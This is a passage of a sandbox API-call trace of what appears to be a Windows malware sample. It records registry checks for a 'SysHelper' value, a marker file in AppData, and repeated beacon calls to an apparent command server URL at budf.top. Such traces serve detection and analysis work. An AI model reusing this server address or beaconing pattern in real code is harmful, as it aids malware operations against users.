0x335d350 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x335dbd8 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x335e460 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x335ece8 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x335f570 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x335fdf8 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3360680 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6298 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3360f08 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3366c18 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3367430 [0198.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3367c48 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3368460 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3368c78 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3369490 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3369ca8 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3844b0 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3361790 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3362018 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x33628a0 [0198.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3363128 [0198.960] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x32ea450, dwCreationFlags=0x0, lpThreadId=0x32d0a30 | out: lpThreadId=0x32d0a30*=0x600) returned 0x5cc [0198.961] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x620) returned 0x5d0 [0198.962] GetMessageW (lpMsg=0x18e470, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0207.340] NtdllDefWindowProc_W () returned 0x0 [0213.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b7b950 [0213.699] GetComputerNameW (in: lpBuffer=0x3b7b950, nSize=0x18d7ec | out: lpBuffer="XDUWTFONO", nSize=0x18d7ec) returned 1 [0213.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9160 [0213.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0213.705] IsWindow (hWnd=0x20148) returned 1 [0213.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9160 | out: hHeap=0x2c0000) returned 1 [0268.632] NtdllDefWindowProc_W () returned 0x1 Thread: id = 178 os_tid = 0x6dc Thread: id = 179 os_tid = 0x6e0 Thread: id = 180 os_tid = 0x6e4 Thread: id = 181 os_tid = 0x6e8 Thread: id = 182 os_tid = 0x6ec Thread: id = 183 os_tid = 0x6f0 Thread: id = 184 os_tid = 0x6f4 Thread: id = 244 os_tid = 0x590 Thread: id = 245 os_tid = 0x5cc Thread: id = 294 os_tid = 0x360 [0168.110] timeGetTime () returned 0x11353d8 [0168.110] GetLastError () returned 0x54f [0168.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x32dbbe8 [0168.116] GetCurrentThreadId () returned 0x360 [0168.116] SetLastError (dwErrCode=0x54f) [0168.116] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x99aa5e4 | out: phkResult=0x99aa5e4*=0x5a8) returned 0x0 [0168.116] RegQueryValueExW (in: hKey=0x5a8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x99aa5d8, lpData=0x99aa5e0, lpcbData=0x99aa5dc*=0x4 | out: lpType=0x99aa5d8*=0x4, lpData=0x99aa5e0*=0x1, lpcbData=0x99aa5dc*=0x4) returned 0x0 [0168.116] RegCloseKey (hKey=0x5a8) returned 0x0 [0168.144] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x99aa4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0168.145] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0168.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2e6af8 [0168.151] AreFileApisANSI () returned 1 [0168.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x99aa4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0168.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7a) returned 0x320858 [0168.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x99aa4e4, cbMultiByte=-1, lpWideCharStr=0x320858, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0168.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x99aa368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0168.192] GetLastError () returned 0x2 [0168.192] GetLastError () returned 0x2 [0168.192] SetLastError (dwErrCode=0x2) [0168.192] GetLastError () returned 0x2 [0168.192] SetLastError (dwErrCode=0x2) [0168.192] GetLastError () returned 0x2 [0168.192] SetLastError (dwErrCode=0x2) [0168.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320858 | out: hHeap=0x2c0000) returned 1 [0168.198] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0168.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384378 [0168.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2eeb38 [0168.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384378 | out: hHeap=0x2c0000) returned 1 [0168.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32abf8 [0168.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x32e9b70 [0168.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32abf8, cbMultiByte=-1, lpWideCharStr=0x32e9b70, cchWideChar=1056 | out: lpWideCharStr="B56D42C81778FD36CA7BD76E3CC6490E") returned 33 [0168.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x32ea3b8 [0168.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e9b70 | out: hHeap=0x2c0000) returned 1 [0168.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32abf8 | out: hHeap=0x2c0000) returned 1 [0168.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x32d7d08 [0168.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb38 | out: hHeap=0x2c0000) returned 1 [0168.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea3b8 | out: hHeap=0x2c0000) returned 1 [0168.198] lstrcpyW (in: lpString1=0x99aaf78, lpString2="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" [0168.198] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0170.575] InternetReadFile (in: hFile=0x0, lpBuffer=0x99aa778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x99aa604 | out: lpBuffer=0x99aa778, lpdwNumberOfBytesRead=0x99aa604) returned 0 [0170.575] InternetCloseHandle (hInternet=0x0) returned 0 [0170.575] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0170.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d7d08 | out: hHeap=0x2c0000) returned 1 [0170.575] timeGetTime () returned 0x1135d79 [0170.575] timeGetTime () returned 0x1135d79 [0170.575] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0170.576] Sleep (dwMilliseconds=0x64) [0170.682] timeGetTime () returned 0x1135de6 [0170.682] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0170.682] Sleep (dwMilliseconds=0x64) [0170.799] timeGetTime () returned 0x1135e53 [0170.799] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0170.799] Sleep (dwMilliseconds=0x64) [0170.901] timeGetTime () returned 0x1135ec0 [0170.901] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0170.901] Sleep (dwMilliseconds=0x64) [0171.010] timeGetTime () returned 0x1135f2e [0171.010] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0171.010] Sleep (dwMilliseconds=0x64) [0171.119] timeGetTime () returned 0x1135f9b [0171.119] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0171.119] Sleep (dwMilliseconds=0x64) [0171.229] timeGetTime () returned 0x1136008 [0171.229] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0171.229] Sleep (dwMilliseconds=0x64) [0171.337] timeGetTime () returned 0x1136075 [0171.337] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0171.337] Sleep (dwMilliseconds=0x64) [0171.447] timeGetTime () returned 0x11360e2 [0171.447] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0171.447] Sleep (dwMilliseconds=0x64) [0171.556] timeGetTime () returned 0x1136150 [0171.556] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0171.556] Sleep (dwMilliseconds=0x64) [0171.665] timeGetTime () returned 0x11361bd [0171.665] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0171.665] Sleep (dwMilliseconds=0x64) [0171.774] timeGetTime () returned 0x113622a [0171.774] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0171.774] Sleep (dwMilliseconds=0x64) [0171.883] timeGetTime () returned 0x1136297 [0171.884] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0171.884] Sleep (dwMilliseconds=0x64) [0171.993] timeGetTime () returned 0x1136304 [0171.993] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0171.993] Sleep (dwMilliseconds=0x64) [0172.102] timeGetTime () returned 0x1136372 [0172.102] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0172.102] Sleep (dwMilliseconds=0x64) [0172.216] timeGetTime () returned 0x11363df [0172.216] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0172.216] Sleep (dwMilliseconds=0x64) [0172.323] timeGetTime () returned 0x113644c [0172.323] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0172.323] Sleep (dwMilliseconds=0x64) [0172.431] timeGetTime () returned 0x11364b9 [0172.431] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0172.431] Sleep (dwMilliseconds=0x64) [0172.539] timeGetTime () returned 0x1136526 [0172.539] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0172.539] Sleep (dwMilliseconds=0x64) [0172.648] timeGetTime () returned 0x1136594 [0172.648] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0172.648] Sleep (dwMilliseconds=0x64) [0172.757] timeGetTime () returned 0x1136601 [0172.757] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0172.757] Sleep (dwMilliseconds=0x64) [0172.866] timeGetTime () returned 0x113666e [0172.866] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0172.866] Sleep (dwMilliseconds=0x64) [0172.976] timeGetTime () returned 0x11366db [0172.976] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0172.976] Sleep (dwMilliseconds=0x64) [0173.095] timeGetTime () returned 0x1136748 [0173.095] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0173.095] Sleep (dwMilliseconds=0x64) [0173.194] timeGetTime () returned 0x11367b6 [0173.194] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0173.194] Sleep (dwMilliseconds=0x64) [0173.303] timeGetTime () returned 0x1136823 [0173.303] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0173.303] Sleep (dwMilliseconds=0x64) [0173.412] timeGetTime () returned 0x1136890 [0173.412] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0173.412] Sleep (dwMilliseconds=0x64) [0173.521] timeGetTime () returned 0x11368fd [0173.521] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0173.522] Sleep (dwMilliseconds=0x64) [0173.652] timeGetTime () returned 0x113697a [0173.652] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0173.652] Sleep (dwMilliseconds=0x64) [0173.755] timeGetTime () returned 0x11369e7 [0173.755] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0173.755] Sleep (dwMilliseconds=0x64) [0173.865] timeGetTime () returned 0x1136a54 [0173.865] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0173.865] Sleep (dwMilliseconds=0x64) [0173.974] timeGetTime () returned 0x1136ac2 [0173.974] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0173.974] Sleep (dwMilliseconds=0x64) [0174.083] timeGetTime () returned 0x1136b2f [0174.083] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0174.083] Sleep (dwMilliseconds=0x64) [0174.194] timeGetTime () returned 0x1136b9c [0174.195] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0174.195] Sleep (dwMilliseconds=0x64) [0174.301] timeGetTime () returned 0x1136c09 [0174.302] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0174.302] Sleep (dwMilliseconds=0x64) [0174.411] timeGetTime () returned 0x1136c76 [0174.411] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0174.411] Sleep (dwMilliseconds=0x64) [0174.520] timeGetTime () returned 0x1136ce4 [0174.520] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0174.520] Sleep (dwMilliseconds=0x64) [0174.629] timeGetTime () returned 0x1136d51 [0174.629] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0174.629] Sleep (dwMilliseconds=0x64) [0174.758] timeGetTime () returned 0x1136dce [0174.758] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0174.758] Sleep (dwMilliseconds=0x64) [0174.863] timeGetTime () returned 0x1136e3b [0174.863] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0174.863] Sleep (dwMilliseconds=0x64) [0174.972] timeGetTime () returned 0x1136ea8 [0174.972] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0174.972] Sleep (dwMilliseconds=0x64) [0175.082] timeGetTime () returned 0x1136f15 [0175.082] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0175.082] Sleep (dwMilliseconds=0x64) [0175.193] timeGetTime () returned 0x1136f82 [0175.193] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0175.193] Sleep (dwMilliseconds=0x64) [0175.300] timeGetTime () returned 0x1136ff0 [0175.300] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0175.300] Sleep (dwMilliseconds=0x64) [0175.409] timeGetTime () returned 0x113705d [0175.409] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0175.409] Sleep (dwMilliseconds=0x64) [0175.518] timeGetTime () returned 0x11370ca [0175.518] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0175.518] Sleep (dwMilliseconds=0x64) [0175.627] timeGetTime () returned 0x1137137 [0175.628] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x99aa4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0175.628] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0175.628] AreFileApisANSI () returned 1 [0175.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x99aa4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0175.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7a) returned 0x320858 [0175.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x99aa4e4, cbMultiByte=-1, lpWideCharStr=0x320858, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0175.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x99aa368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.635] GetLastError () returned 0x2 [0175.635] GetLastError () returned 0x2 [0175.635] SetLastError (dwErrCode=0x2) [0175.635] GetLastError () returned 0x2 [0175.635] SetLastError (dwErrCode=0x2) [0175.635] GetLastError () returned 0x2 [0175.635] SetLastError (dwErrCode=0x2) [0175.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320858 | out: hHeap=0x2c0000) returned 1 [0175.635] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0175.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384310 [0175.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2eed00 [0175.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384310 | out: hHeap=0x2c0000) returned 1 [0175.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bffb0 [0175.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x32d7d08 [0175.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32bffb0, cbMultiByte=-1, lpWideCharStr=0x32d7d08, cchWideChar=1056 | out: lpWideCharStr="B56D42C81778FD36CA7BD76E3CC6490E") returned 33 [0175.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x32ea568 [0175.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d7d08 | out: hHeap=0x2c0000) returned 1 [0175.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bffb0 | out: hHeap=0x2c0000) returned 1 [0175.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x32d7d08 [0175.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed00 | out: hHeap=0x2c0000) returned 1 [0175.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea568 | out: hHeap=0x2c0000) returned 1 [0175.636] lstrcpyW (in: lpString1=0x99aaf78, lpString2="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" [0175.636] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0177.993] InternetReadFile (in: hFile=0x0, lpBuffer=0x99aa778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x99aa604 | out: lpBuffer=0x99aa778, lpdwNumberOfBytesRead=0x99aa604) returned 0 [0177.993] InternetCloseHandle (hInternet=0x0) returned 0 [0177.993] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0178.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d7d08 | out: hHeap=0x2c0000) returned 1 [0178.012] timeGetTime () returned 0x1137a7a [0178.012] timeGetTime () returned 0x1137a7a [0178.012] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0178.012] Sleep (dwMilliseconds=0x64) [0178.155] timeGetTime () returned 0x1137b16 [0178.155] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0178.155] Sleep (dwMilliseconds=0x64) [0178.265] timeGetTime () returned 0x1137b84 [0178.265] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, 